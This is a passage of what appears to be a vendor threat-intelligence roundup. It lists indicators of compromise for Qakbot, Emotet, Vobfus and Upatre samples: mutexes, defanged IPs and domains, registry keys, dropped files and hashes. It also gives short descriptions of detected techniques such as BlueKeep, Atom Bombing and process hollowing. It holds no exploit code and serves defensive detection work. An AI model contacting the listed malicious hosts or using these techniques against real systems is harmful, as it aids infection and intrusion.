*\n\n### Win.Dropper.Qakbot-7287972-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 9 \n`<random, matching [a-fA-F0-9]{10}>` | 6 \n`NO_HIDE` | 2 \n`Global\\eqfik` | 1 \n`Global\\epieuxzk` | 1 \n`Global\\ulnahjoi` | 1 \n`Global\\utjvfi` | 1 \n`Global\\siexlcvo` | 1 \n`Global\\3e356201-e784-11e9-a007-00501e3ae7b5` | 1 \n`9a1e0bdf466b43e51e62125b6de07886\u00d0\u00f7# Administra` | 1 \n`Global\\zmzqw` | 1 \n`Global\\hzquyt` | 1 \n`Global\\orprmhqn` | 1 \n`llvmspnzmgf` | 1 \n`Global\\emiudb` | 1 \n`siexlcvo/W` | 1 \n`Global\\okqxsvm` | 1 \n`hnqgbtxnpbgb` | 1 \n`Global\\awfury` | 1 \n`Global\\mesgra` | 1 \n`Global\\esute` | 1 \n`Global\\caypop` | 1 \n`azvfitrmerda` | 1 \n`Global\\yweieuzg` | 1 \n`Global\\lajpa` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]241[.]80[.]162` | 8 \n`69[.]241[.]74[.]170` | 8 \n`69[.]241[.]108[.]58` | 8 \n`69[.]241[.]106[.]102` | 8 \n`209[.]126[.]124[.]173` | 7 \n`66[.]96[.]134[.]31` | 6 \n`66[.]7[.]210[.]190` | 6 \n`65[.]182[.]187[.]52` | 6 \n`181[.]224[.]138[.]240` | 5 \n`69[.]64[.]56[.]244` | 5 \n`162[.]144[.]12[.]241` | 5 \n`208[.]100[.]26[.]234` | 3 \n`64[.]34[.]169[.]244` | 3 \n`108[.]61[.]103[.]175` | 3 \n`193[.]28[.]179[.]105` | 3 \n`12[.]167[.]151[.]78/31` | 3 \n`216[.]58[.]217[.]142` | 2 \n`195[.]22[.]28[.]222` | 2 \n`173[.]227[.]247[.]50` | 2 \n`12[.]167[.]151[.]89` | 2 \n`12[.]167[.]151[.]81` | 2 \n`195[.]22[.]28[.]199` | 1 \n`173[.]227[.]247[.]49` | 1 \n`173[.]227[.]247[.]34` | 1 \n`173[.]227[.]247[.]59` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jacksonville-a[.]speedtest[.]comcast[.]net` | 8 \n`stc-sjos-01[.]sys[.]comcast[.]net` | 8 \n`stc-fxbo-01[.]sys[.]comcast[.]net` | 8 \n`www[.]ip-adress[.]com` | 8 \n`stc-hstn-03[.]sys[.]comcast[.]net` | 8 \n`boston[.]speedtest[.]comcast[.]net` | 8 \n`houston[.]speedtest[.]comcast[.]net` | 8 \n`sanjose[.]speedtest[.]comcast[.]net` | 8 \n`jacksonville[.]speedtest[.]comcast[.]net` | 8 \n`wpaoyqevfvmqquvpfwo[.]com` | 3 \n`ageanrzekiycakzrswcq[.]com` | 3 \n`utglavlafksmzfcniumfwwbm[.]biz` | 3 \n`wyrlmssiybtkxemblgkturpw[.]net` | 3 \n`qguuivkqppwohlzzvjv[.]org` | 3 \n`ohfckvgylddiulbtgcrdijtpl[.]org` | 3 \n`zhkclrrbgufzsgljzohs[.]com` | 3 \n`evvedpvqyno[.]net` | 3 \n`cyiynudufvqmswxgtdkgyal[.]org` | 3 \n`fmncuwynktocekwqmthsr[.]net` | 3 \n`hrmmnxigwodcsbqhcezedv[.]net` | 3 \n`ohnzjsjoyxmkfpafaouujked[.]biz` | 3 \n`rpagfveavil[.]com` | 3 \n`ocqfamsdr[.]org` | 3 \n`sso[.]anbtr[.]com` | 2 \n`tnqnpjthcwhhit[.]biz` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcv.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcvo.exe` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq\\eqfi.dll` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq\\eqfik.exe` | 1 \n`%HOMEPATH%\\APPLIC~1\\AuthHost_86.exe` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\cemiudb32.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiud.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiudb.exe` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiudb32.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\qaodxae.exe` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\csiexlcvo32.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcvo32.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\u\\siexlcvo.exe` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypo.dll` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypop.exe` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypop32.dll` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\ccaypop32.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\cnkswh32.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nksw.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nkswh.exe` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nkswh32.dll` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\cteubkc32.dll` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\ojpgopoc.exe` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\teubk.dll` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00ff1db58b6f1e59ab2c2bf8e56160505a45d4a81f6fe1eaa929e64fb1721579 064778a5c62de64d9209efd2a1d07d51e5bba27dec7304adb16cb0f477990da7 10498726da41ce76941828ba2645cd142d14345730ed27ef477ef3360776b70e 1550ddeb6bedfa869544e6acff1b99deef5ed36c5d3e53bb8c54a7dfc1ee7979 16e32d59b24b270c97fc9003ce99d52bbd5d2f8f71066a7ae89489b70230b6ea 2a4d5212548373f2036751006f472fd59796cb1f3ea0a5e3b00ff257dda42d90 2a98486961a037fc69ad76a352cdbd94b9e9b20e935ea2223632616af9cf9164 2f8eaa9d09eea245e077d855496d325833f431c565b0caf376694a20786a360d 33e8352baa3fd5c8657f950f6853c852ab5bc7a8738ef0100393e8840170f689 3c671a2c98bad1d21523542d92d3e7e64f10dc11b71ad877a12d3c716f79d6c5 3ed342a425980d09017f40042c3bc38c995f80b25ebc0ce54f57aa247a399972 433da825e9d75917a8e935ce67e352de3300c2276b8e1e4088ad353f1dc563cd 4567101b5264de0d437095f3dad638f1f663eca77eb737f1c8188133786c42a3 49a262416b8af5718487c966f6d328f12b7dd39c4e48c1d12ec99eb6f67b5bf7 5008602076bc658f669bcbdcdcdae8ac0db03df3d67d59cc8a594916c7e0eab7 546fe2283bec932d0e579545928b7c61aa4865891ae2ae270311cb43d37f24fc 5694eba592c8d2dc736d820dfe10f1cb70fc613595349358e67651b04f8d5f9c 5873b0a3726c51faf9e15170f2cc2cf907da40bd6535886c2f4cc5eb4d1b677f 5a779b62299bf87288404f408ffd1ca26ffb365a1a80a3f0be02634dbb6b0acd 61e897720193eb60766425f7952795081b220bd3fcb84693d127ae08cdc7fd77 64a7ea2afabd89b89154b3e9165e4821194657eaa2df6f3c05513ac57f4269a1 67d275ebe2e3e3653d1a9dfc9e68abe38adaca68e30d4335e974fe9393ed1166 7103e2d1e6b0cb025ba011e3b71b959beb9dba33e919d22ce710703b0cecc9d3 7173180702f16103ff9e12dc30a4d35ffe8e59fed07a9b85b1a8051cccc3443c 75294d7224051e0fc6f7a583941ed6be64270f2296f01a2f907c475bcc604296 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-diOr4nVxLus/XaCZODwtgoI/AAAAAAAACwI/i6MnwDpChPAzELBy_c8prmEqG8io00PAQCLcBGAsYHQ/s1600/7103e2d1e6b0cb025ba011e3b71b959beb9dba33e919d22ce710703b0cecc9d3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-vIPJRGd5KIc/XaCZdiQvCUI/AAAAAAAACwQ/8yuvzeDBGn4bdI32E86fo_L7eHsk104QgCLcBGAsYHQ/s1600/9a1e0bdf466b43e51e62125b6de07886d5cad816c12362db837d9496d9ee3afa_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-gRpByRbRd6k/XaCZlQKaDSI/AAAAAAAACwY/MT_B_Pq7tIYRN7X8Fj4OJ1fKopA1yoXMQCLcBGAsYHQ/s1600/2a98486961a037fc69ad76a352cdbd94b9e9b20e935ea2223632616af9cf9164_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Emotet-7287811-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Type ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Start ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ErrorControl ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: DisplayName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: WOW64 ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ObjectName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Description ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL ` | 13 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\M3C28B0E4` | 13 \n`Global\\I3C28B0E4` | 13 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`80[.]11[.]163[.]139` | 11 \n`85[.]54[.]169[.]141` | 10 \n`185[.]14[.]187[.]201` | 4 \n`45[.]79[.]188[.]67` | 4 \n`63[.]142[.]253[.]122` | 4 \n`67[.]225[.]229[.]55` | 3 \n`193[.]70[.]18[.]144` | 2 \n`193[.]252[.]22[.]86` | 2 \n`17[.]36[.]205[.]74` | 2 \n`212[.]227[.]15[.]142` | 2 \n`213[.]180[.]147[.]145` | 2 \n`52[.]96[.]40[.]242` | 2 \n`62[.]149[.]157[.]55` | 2 \n`217[.]116[.]0[.]228` | 2 \n`62[.]149[.]128[.]179` | 2 \n`173[.]194[.]68[.]108/31` | 2 \n`82[.]223[.]190[.]138/31` | 2 \n`62[.]28[.]40[.]155` | 1 \n`82[.]223[.]191[.]228` | 1 \n`84[.]232[.]4[.]63` | 1 \n`5[.]56[.]56[.]146` | 1 \n`37[.]187[.]56[.]166` | 1 \n`134[.]0[.]12[.]48` | 1 \n`213[.]0[.]77[.]51` | 1 \n`208[.]91[.]198[.]107` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]office365[.]com` | 2 \n`smtp[.]outlook[.]com` | 2 \n`smtp[.]1and1[.]es` | 2 \n`mail[.]comcast[.]net` | 2 \n`mail[.]1und1[.]de` | 2 \n`outlook[.]office365[.]com` | 2 \n`smtp[.]one[.]com` | 2 \n`smtp[.]orange[.]fr` | 2 \n`smtp[.]serviciodecorreo[.]es` | 2 \n`mail[.]gmx[.]net` | 2 \n`smtp[.]poczta[.]onet[.]pl` | 2 \n`mail[.]aruba[.]it` | 2 \n`pop3s[.]aruba[.]it` | 2 \n`smtp[.]pec[.]aruba[.]it` | 2 \n`smtp[.]myfbmc[.]com` | 1 \n`mail[.]amazon[.]com` | 1 \n`smtp[.]amazon[.]com` | 1 \n`mail[.]bellnet[.]ca` | 1 \n`mail[.]hotmail[.]es` | 1 \n`smtp[.]ogicom[.]pl` | 1 \n`smtp[.]my[.]tnt[.]com` | 1 \n`mail[.]pec[.]it` | 1 \n`mail[.]kovalam[.]es` | 1 \n`smtp[.]myslide[.]cn` | 1 \n`smtp[.]tepore[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 12 \n`\\TEMP\\yc3qjv_812.exe` | 1 \n`\\TEMP\\njrfqcj58z_23190.exe` | 1 \n`\\TEMP\\b2_13022603.exe` | 1 \n`\\TEMP\\5tnlmwuu_6728847347.exe` | 1 \n`\\TEMP\\feqxn9l_08751690.exe` | 1 \n`\\TEMP\\u1p1rr_2846411837.exe` | 1 \n`\\TEMP\\93cumzh_740237.exe` | 1 \n`%SystemRoot%\\TEMP\\DFFB.tmp` | 1 \n \n#### File Hashes\n\n` 0d2fcaa55a4fa60ddb207a884d8708616afe216172606cb34428696d94d02b55 1d79c23865675ea988e8da616d87729fc029e3da8655a452ec8603c2645ed29c 1eda8a1b220b335de0e0dcc4b1c370f063d3bb8179e78e1aa5aa07d97182e50e 2f2fde0c36731205d5c8139450b3e65c99c4b101632f9e5b359d241bd39bc854 4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290 6e0ff7d8aabe7604957239a4217e8acd18261216c6fd4447c3e3ea061062bad5 7999aecb854548554573e807e3099b3285ffa31244668bda61a60ca02763de48 c2b0637eaa88c02f22d551ece7de3220d4888a7882676fd7b51c6c577140ce51 ce8949e5a1b41b1b1ff2d6d432aef7af6db3c4308b4e58839b9e6958846cd24e d5128c8528eaf67f71aa26c53db2b9035ee95849f03ab991ae9805bf4c07f496 e142a57f84461cad1faea965d00decb6ed53eb65fc884acd52ffede5454d1a4e e28a38d8fdd96021b0391fc8a2f0e88da19143a6084ab6a64ff93fdb1d2c9ee2 fe84dbdcefa7c810abd780e0ca47c5bdfaa8c27146b810e2d784d1b00a077aa0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-SRQWZZjN7x4/XaCar6FuH3I/AAAAAAAACwo/0VchjmmiZgE-w8OUhfDzDKGUXKCyfxNAACLcBGAsYHQ/s1600/4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IBunbnm_ww4/XaCavKiuXiI/AAAAAAAACws/6ZkBDPWOzwIgP0dPFndg_9aH0wWd4sqggCLcBGAsYHQ/s1600/4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290_tg.png>)\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7198158-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 23 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xaawee ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juemauy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zltip ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wkxid ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: leohuow ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kuoova ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vjdoq ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: beyuk ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baeuqo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lieagu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juohoah ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: taeele ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baaqaic ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wmquoz ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qeodux ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ziiluet ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mrlot ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: coawi ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ceqav ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: gejay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baule ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xeezua ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mouzui ` | 1 \nMutexes | Occurrences \n---|--- \n`A` | 23 \n`Global\\d11cb3c1-e7ca-11e9-a007-00501e3ae7b5` | 1 \n`Global\\02adca01-e7cb-11e9-a007-00501e3ae7b5` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]videoall[.]net` | 23 \n`ns1[.]videoall[.]org` | 23 \n`ns1[.]player1532[.]com` | 23 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 23 \n`\\$RECYCLE.BIN.lnk` | 23 \n`\\System Volume Information.lnk` | 23 \n`\\Documents.lnk` | 23 \n`\\Music.lnk` | 23 \n`\\New Folder.lnk` | 23 \n`\\Passwords.lnk` | 23 \n`\\Pictures.lnk` | 23 \n`\\Video.lnk` | 23 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 23 \n`%HOMEPATH%\\<random, matching '[a-z]{5,7}'>.exe` | 23 \n`E:\\$RECYCLE.BIN.lnk` | 22 \n`E:\\autorun.inf` | 22 \n`E:\\x.mpeg` | 22 \n`E:\\System Volume Information.lnk` | 22 \n`E:\\Music.lnk` | 22 \n`E:\\Passwords.lnk` | 22 \n`E:\\Pictures.lnk` | 22 \n`E:\\Documents.lnk` | 22 \n`E:\\New Folder.lnk` | 22 \n`E:\\Video.lnk` | 22 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 22 \n`E:\\RFJ.ico` | 1 \n`\\RFJ.ico` | 1 \n`E:\\baaqaicx.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 09be96cf7eaf5a8b9e6231dc9f5760df58907a9c8dfb996e406361c3c72e5aa7 0c114b0894e482f57f0909cbd8b8dced3a8d6b20ec50139ccafdc81c1f21d6f2 107add01286993501566a44c448e321e27d3dadef2e2b62162b158cee42f4b80 210c1a435f47d5bca6300a4a323aa416e8edd2855946a9b5dc13f525e2061122 261ba2deae2f40205c12ecaa69ac285e3db2669ace697f4f52006aaca3046137 2642ae8489bf119064a09e9919cf06f92bc5b5882613c673745ffe89b34c2f43 30e340533c70f200d86348c10c78164a165e17a88f62b344e2b76f035386beae 323f9bcc53cdf71e937974d6523174ebb74151af8928d1148d0476c13b3e1622 37d2c4a0c7b4640261d4eae7bfe234eb4029a5686589e96fa78d9da20bf2add8 408680beb42a3d4123ca4136cb02431efdb2efd112d546a378dfea96dd042f5d 423ddc412baf3a6aa9637d6258b7309f08ed1e1bc9c2dddc30cc25732998e42c 46a8888ab48c79a9bdef4cf4ff58f5f58feb8ad6e3926a6ee98f7ea1dc2b383a 4e8f5a3497e7263ad12bdb242fdcbbd9c2d1ff85e862b263ce4b4d138f00002c 5642cb5f8c9d9115143cf67b67b50327dc6ac07c78e87334f52d3a89ef7e855c 575c4e03f446b9ae91769cc7be8b7cc8aa451d607615a69ac0797190240f0bff 5c3a99fa29ab5917f2facf4383dd6284c2fd4c93c0aa9a16cf5a8b605ce3521c 605712812595a21fae8b728974d328ecc2811792cec2f0808653d2ea8ee556c2 610519390720b741a8b2de2686575141bf8839473abdc06ffa9ecfd7efb88a3c 640f88b445819b50d801f63bba996635c07883cf245ddca2f39b592ce07d0a30 777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab 7f285a63779f27c9793b5fdcdcc9f8e8d48207298cb4c3cd18e27889c2dd052a 8232b50475cf369b325dc6866d6b88c27245faf7e572a3629b5c0ad3a88cbd72 84b677c976458077b79120064fe7aa275ad33d19d7651425f3faf6cd717fc520 8536b9a9da4f0b6930ed148166800147062e93f6c31ad70f61eb7ed174383c80 89f1ede2d77a45043f2ce760265d21a512f5e5b011cde43f76c3b968214530e5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-npiRaUMl5QI/XaCbL0aozgI/AAAAAAAACw4/LnDHJMeh_OYLyc-o9kM-VB7fLsk5ohDsgCLcBGAsYHQ/s1600/777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-AMmyrvJ7XZc/XaCbPzyiIyI/AAAAAAAACw8/Dgd1uJRdRNI9ISwCShI7TnLNrnhStOM1wCLcBGAsYHQ/s1600/777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab_tg.png>)\n\n \n\n\n#### Umbrella\n\n* * *\n\n### Win.Dropper.Upatre-7196259-0\n\n#### Indicators of Compromise\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\szgfw.exe` | 43 \n \n#### File Hashes\n\n` 0209860624b9650a80e8e7ccd913c68bbd5e4be9e503c2a1b554c6b3b94861a1 0755dff6699aebb40a37368f78ed9a7b66d3e24d039af8cdd2ad13b8ef969273 0e2cb655432353bc5f362692d75f76b1deb6d4c339db1eacb671731c5f23a733 1191f1f7a73c262102b8ec25f2aecefc26eef287e55934e608ba510b45bff3db 11aa23a13c9a53dae82684af6adf9835fe027550d5b9bfd21604ab1261c97224 25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514 35588e1d2203194ae0524d551d9a5d45bccbfbd9ef226a25e223c4e626db8e7e 37715e5cfc32e42ccd741a8ca0b17276c76b9d28c2ab4ab4edc4ba712cfe98a4 47b69664dd70b8ed9e0f369640f4dfd27a5a33b8bd3d83d572b667551d6465cd 47cbf5466f14bacd5dae7a217a85673048245844e39d081ce4009aa8bbdf0743 48b14ad94dbfe648d7ef4cbce8debeec6b009d9972cb026f7f4ecfea72ae380d 4c6c1e0eb3b508e3bd525b4ce71a1309d231b218f7172bfb5da57a93a050ab5c 4d30d13f5454bc30c92643657d4113a4008e09cd06491e1f73801a14b5415cf5 50bf198fb00ff18f6b08b9aff48c8b5ffcc85cc0dcda23a0359f413113fd6207 51cd17e592d2ebadfd3f15ca6b542f78b2adb4f26b7eaf8c254e849ee141bcc4 52f3ac52e9e2e9ebaba6da86ea629ad07b2017a44a5be6f66a576853341cc1ca 5cdc406d0cfc60b4a6b5cce5411932f250bcf7c60863e71111f461130c2d942f 607473f50e64388087985abb0bb05caa8688a1a17c25607508bb2a3a8a62fc13 607ac8ad70dc43765ea3954c09b2dbe320f7dbe4fe9fee9b07fab9e855aef37b 6516b8c920ae407765804372470187aa6749d1f598e87b7dbe8bf47291039568 658f7d3524bc9db586321be2fb22b1d832cd6f80328dcdbecdfc2734ff45487a 6812985cee6342855219205500bd1bb53300d552f17b88dbeeab1cdad32e55bf 6be61289884c2bd01ddade32649d23fac7bc0ba4591f3eed911101eb44c5181b 6f8ed68f17904767ecd16b1cb1943caa8f474912bffc930082e64512fa48f96f 75c817a4d49bc40781537143aabad6f0496129120503b7276854e9db15b4a965 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-jORer6zG5lg/XaCcnSoEUTI/AAAAAAAACxI/3K0rudeNV6sQDtXyq2dkwtlQHnkJCZMsACLcBGAsYHQ/s1600/25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-HPERaTirDok/XaCcrF_0usI/AAAAAAAACxM/JboQATczhfI_PP-n_EGmQdO-X7SGysGxwCLcBGAsYHQ/s1600/25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (17383) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (3263) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nMadshi injection detected \\- (2949) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1750) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nAtom Bombing code injection technique detected \\- (577) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nProcess hollowing detected \\- (512) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (158) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (149) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nInstallcore adware detected \\- (79) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nAggah malware dropper detected 